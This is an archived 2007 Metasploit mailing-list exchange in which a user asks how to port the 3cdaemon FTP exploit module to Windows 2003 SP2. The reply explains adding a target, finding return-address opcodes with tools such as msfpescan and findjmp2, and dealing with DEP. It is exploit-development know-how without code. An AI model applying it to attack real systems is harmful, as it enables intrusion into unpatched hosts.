[framework] Porting exploit to win2k3 sp2
Jerome Athias
jerome.athias at free.fr
Fri Jul 27 10:27:11 CDT 2007
Konrads Smelkovs wrote :
> Hello,
>
> I found a useful exploit in the framework - 3cdaemon_ftp_user.rb .
> However, it has the jumpcodes(?) only for nt/2k/xp and I need it for
> win2k3 sp2. How to port it? Perhaps somebody already has done so?
> --
> Konrads Smelkovs
> Applied IT sorcery.
Hi Konrads,
the jumpcodes (called "opcodes" in the Metasploit's familly) have to be
modified.
In fact, you have to add a new line, as a new target, in the exploit
module code.
To retrieve an opcode for your target, you have to:
1) Search one in the msfopcodes database
http://www.metasploit.com/opcode_database.html
or here:
https://www.securinfos.info/international-opcodes/index.php
(not updated actually :-/)
or
2) Run one of this tool on it (or on a clone. means: same OS, locale,
SP, and if possible level of patches installed, assuming all are
installed is a good way):
* msfpescan (used with memdump.exe)
You can find an overview of msfpescan here:
The Metasploit's website! always THE place to find information about the MSF
The Metasploit Framework's book:
http://en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit#Finding_a_return_address
hxxp://www.securityfocus.com/infocus/1800
or:
* findjmp2 by class101
https://www.securinfos.info/outils-securite-hacking/Findjmp2.zip
* eereap by eEye
Good luck!
/JA
Jerome Athias, Founder https://www.securinfos.info
PS1: you should have to: change the offset and/or deal with the new
protection mechanisms introduced in Windows 2003 (DEP...)
PS2: i have written an article for Hakin9 about how to write exploit
modules for the MSF v3. It should be available in the coming months (in
both US and French version)
PS3: is copyrighted by Sony
Non-profit spam: retrieve the top killer coding ninja monkeys at
VNSECON07, http://conf.vnsecurity.net/
Tags:
How to modify a Metasploit's exploit module
How to retrieve a return address (opcode) for a Windows exploit
How to add a target in a Metasploit Framework exploit module
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3253 bytes
Desc: S/MIME Cryptographic Signature
Url : http://spool.metasploit.com/pipermail/framework/attachments/20070727/48d62cc7/attachment.bin
More information about the framework
mailing list